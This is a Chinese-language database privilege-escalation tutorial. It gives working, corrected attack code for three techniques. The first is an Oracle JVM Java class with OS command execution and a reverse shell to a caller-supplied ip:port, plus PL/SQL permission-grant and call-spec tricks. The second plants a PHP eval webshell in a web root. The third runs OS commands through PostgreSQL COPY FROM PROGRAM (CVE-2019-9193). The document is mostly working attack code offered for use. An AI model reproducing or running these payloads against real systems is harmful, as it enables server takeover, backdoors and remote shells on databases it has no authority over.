

Oracle Java 函数提权（通过 Oracle JVM 执行操作系统命令）
提权前提
1、当前数据库账号具有 DBA 权限，且数据库已安装 Oracle JVM（dbms_java 包可用）
提权过程
第一步:执行以下 PL/SQL 块，将 Java 源码编译并加载为名为 ShellUtil 的类
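-- Step 1: compile the Java class ShellUtil inside the database.
-- Needs DBA rights and an installed Oracle JVM. The whole Java source is a
-- PL/SQL string literal, so it must not contain single quotes.
DECLARE
  v_command VARCHAR2(32767);
BEGIN
  v_command := 'create or replace and compile java source named "ShellUtil" as
import java.io.*;
import java.net.Socket;
import java.util.StringTokenizer;

public class ShellUtil extends Object {

    // Entry point reached through the ShellRun call spec.
    // methodName "exec": run params as an OS command and return its output.
    // methodName "connectback": params is "ip^port"; open a reverse shell to it.
    // encoding: charset used to decode command output (exec only).
    // Returns the command output, "^OK^" for a started reverse shell, or an
    // error text; a non-numeric port propagates as NumberFormatException.
    public static String run(String methodName, String params, String encoding) {
        if ("exec".equals(methodName)) {
            return ShellUtil.exec(params, encoding);
        }
        if ("connectback".equals(methodName)) {
            int sep = params.indexOf("^");
            if (sep < 0) {
                return "connectback expects params as ip^port";
            }
            String ip = params.substring(0, sep);
            String port = params.substring(sep + 1);
            return ShellUtil.connectBack(ip, Integer.parseInt(port));
        }
        return "unkown methodName";
    }

    // Run one command without a shell: tokens are split on whitespace exactly
    // like Runtime.exec(String), so pipes, quoting and redirects are not
    // interpreted. stdout and stderr are merged (a failing command previously
    // came back as an empty string) and decoded with the given charset, one
    // line per output line. The result travels back through a VARCHAR2 call
    // spec, so very long output may hit the VARCHAR2 size limit on the SQL side.
    public static String exec(String command, String encoding) {
        StringBuffer result = new StringBuffer();
        BufferedReader reader = null;
        try {
            StringTokenizer st = new StringTokenizer(command);
            String[] argv = new String[st.countTokens()];
            for (int i = 0; i < argv.length; i++) {
                argv[i] = st.nextToken();
            }
            ProcessBuilder pb = new ProcessBuilder(argv);
            pb.redirectErrorStream(true);
            Process p = pb.start();
            reader = new BufferedReader(new InputStreamReader(p.getInputStream(), encoding));
            String line;
            while ((line = reader.readLine()) != null) {
                result.append(line).append("\n"); // keep line boundaries in the result
            }
            p.waitFor();
        } catch (Exception e) {
            result.append(e.toString());
        } finally {
            if (reader != null) {
                try { reader.close(); } catch (IOException ignored) { }
            }
        }
        return result.toString();
    }

    // Connect to ip:port and wire a local shell (/bin/sh, or cmd.exe on
    // Windows) to that socket; two threads copy raw bytes in each direction.
    // Under the Oracle JVM this needs java.net.SocketPermission (connect,
    // resolve) for the target in addition to the FilePermission granted in
    // step 2; without it the Socket constructor throws and the error text is
    // returned instead of "^OK^".
    public static String connectBack(String ip, int port) {
        // Copies bytes from in to out until EOF or error, then closes both ends.
        class StreamConnector extends Thread {
            private final InputStream in;
            private final OutputStream out;

            StreamConnector(InputStream in, OutputStream out) {
                this.in = in;
                this.out = out;
            }

            @Override
            public void run() {
                byte[] buf = new byte[8192];
                try {
                    int n;
                    while ((n = in.read(buf)) > 0) {
                        out.write(buf, 0, n);
                        out.flush();
                    }
                } catch (IOException e) {
                    // connection dropped or shell exited: fall through to cleanup
                } finally {
                    try { in.close(); } catch (IOException ignored) { }
                    try { out.close(); } catch (IOException ignored) { }
                }
            }
        }

        boolean windows = System.getProperty("os.name").toLowerCase().indexOf("windows") != -1;
        String shell = windows ? "cmd.exe" : "/bin/sh";
        Socket sock = null;
        try {
            sock = new Socket(ip, port);
            ProcessBuilder pb = new ProcessBuilder(shell);
            pb.redirectErrorStream(true); // send shell stderr to the client too
            Process ps = pb.start();
            new StreamConnector(ps.getInputStream(), sock.getOutputStream()).start();
            new StreamConnector(sock.getInputStream(), ps.getOutputStream()).start();
        } catch (Exception e) {
            // Failure used to be swallowed and still reported "^OK^"; close the
            // half-open socket and surface the reason to the caller instead.
            if (sock != null) {
                try { sock.close(); } catch (IOException ignored) { }
            }
            return "connectback failed: " + e.toString();
        }
        return "^OK^";
    }
}';
  EXECUTE IMMEDIATE v_command;
END;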

第二步:授予执行操作系统命令所需的 Java 权限（java.io.FilePermission <<ALL FILES>> execute；反弹 shell 还需要 java.net.SocketPermission，本步未授予）
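-- Step 2: grant the Java permission that Runtime.exec needs
-- (java.io.FilePermission <<ALL FILES>> execute). The block is wrapped in
-- dbms_xmlquery.newcontext so PL/SQL runs from a plain SELECT, and
-- PRAGMA AUTONOMOUS_TRANSACTION lets it COMMIT independently of the caller.
-- Fixes to the original text: the permission name is <<ALL FILES>> with a
-- space, and the inner EXECUTE IMMEDIATE needs its own semicolon before COMMIT.
-- NOTE(review): the grantee is SYSTEM; it must be the schema whose rights the
-- Java code runs under (the owner of ShellRun) -- change it if that differs.
-- The reverse-shell path additionally needs java.net.SocketPermission
-- (connect,resolve), which this grant does not give.
select dbms_xmlquery.newcontext(
  'declare
     PRAGMA AUTONOMOUS_TRANSACTION;
   begin
     execute immediate ''begin dbms_java.grant_permission(''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''', ''''EXECUTE''''); end;'';
     commit;
   end;'
) from dual;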

第三步:创建 PL/SQL 函数 ShellRun，作为 Java 方法 ShellUtil.run 的调用规范（call spec）
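-- Step 3: create the PL/SQL call spec ShellRun that maps onto the static Java
-- method ShellUtil.run loaded in step 1, again issued through
-- dbms_xmlquery.newcontext so it works from a SELECT. Parameter order
-- (p_methodName, p_params, p_encoding) must stay, since step 4 calls it
-- positionally. Fixes to the original text: "in varchar2" and "as language"
-- had their spaces dropped.
-- NOTE(review): Oracle documents Java return types fully qualified
-- (return java.lang.String); plain "return String" is kept as on the page --
-- confirm it compiles on the target release.
select dbms_xmlquery.newcontext(
  'declare
     PRAGMA AUTONOMOUS_TRANSACTION;
   begin
     execute immediate ''create or replace function ShellRun(p_methodName in varchar2, p_params in varchar2, p_encoding in varchar2) return varchar2 as language java name ''''ShellUtil.run(java.lang.String, java.lang.String, java.lang.String) return String'''';'';
     commit;
   end;'
) from dual;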

第四步:通过 ShellRun 函数执行系统命令（命令以运行 Oracle 数据库进程的操作系统账号身份执行，通常为 oracle 用户）
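-- Step 4: run an OS command through ShellRun. The third argument is the charset
-- used to decode the output: GB2312 suits a Chinese Windows console, UTF-8 is
-- the usual choice on Linux. The command runs as the OS account of the Oracle
-- server process, so whoami reports that account rather than the DB user.
-- For the reverse-shell path the second argument is "ip^port" (see ShellUtil.run).
-- Fix to the original text: "select" and "shellrun" had been run together.
select shellrun('exec', 'whoami', 'GB2312') from dual;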



写文件提权
提权前提
1、数据库账号具有向服务器文件系统写文件的权限（例如超级用户 / DBA 权限）
2、已知 Web 应用的物理绝对路径，并且运行数据库服务的操作系统账号对该目录有写权限（这是数据库进程的文件系统权限，而不是数据库账号的权限）
提权过程
第一步:执行以下语句创建表
-- Staging table: one text column that will hold the webshell source
-- before it is written out to the web root.
CREATE TABLE test1 (t TEXT);

第二步:向该表中插入 PHP webshell 代码（注意 <?php 之后必须有空白字符，否则 PHP 无法识别开标签）
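-- Insert the PHP one-liner. PHP only recognises the open tag when whitespace
-- follows "<?php"; the original text had "<?php@eval" run together, which
-- would not parse. "test1" is the POST parameter name (the webshell password)
-- that the management tool in step 4 must send.
INSERT INTO test1 (t) VALUES ('<?php @eval($_POST["test1"]); ?>');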

第三步:将表内容导出到 Web 目录下的 .php 文件（本页未给出具体导出语句，语法取决于数据库类型；文件必须落在 Web 服务器会交给 PHP 解析的目录中）

第四步:使用 webshell 管理工具连接，连接密码（POST 参数名）为 test1

CVE-2019-9193 提权（PostgreSQL COPY ... FROM PROGRAM 命令执行；PostgreSQL 官方认为这是设计内的特性，该 CVE 存在争议）
提权前提
1、PostgreSQL 9.3 及以上（CVE 记录列出的是 9.3 至 11.2，但 COPY ... FROM PROGRAM 在之后的版本中依然存在）
2、数据库账号为超级用户，或（PostgreSQL 11 起）属于 pg_execute_server_program 角色；命令以运行 PostgreSQL 服务进程的操作系统账号（通常为 postgres）执行，并非 root
提权过程
第一步:创建表
-- Scratch table: each line of the command output lands in one row.
CREATE TABLE testcmd (t TEXT);

第二步:执行以下语句，让 PostgreSQL 服务进程运行命令并把输出逐行写入该表（输出中的 whoami 结果即为数据库进程的操作系统账号）
-- Server-side command execution: the postgres backend runs the program and
-- feeds its stdout into the named column, one row per line.
COPY testcmd (t) FROM PROGRAM 'whoami';

第三步:查询创建的表中数据
-- Read back the captured command output (the table has the single column t).
SELECT t FROM testcmd;


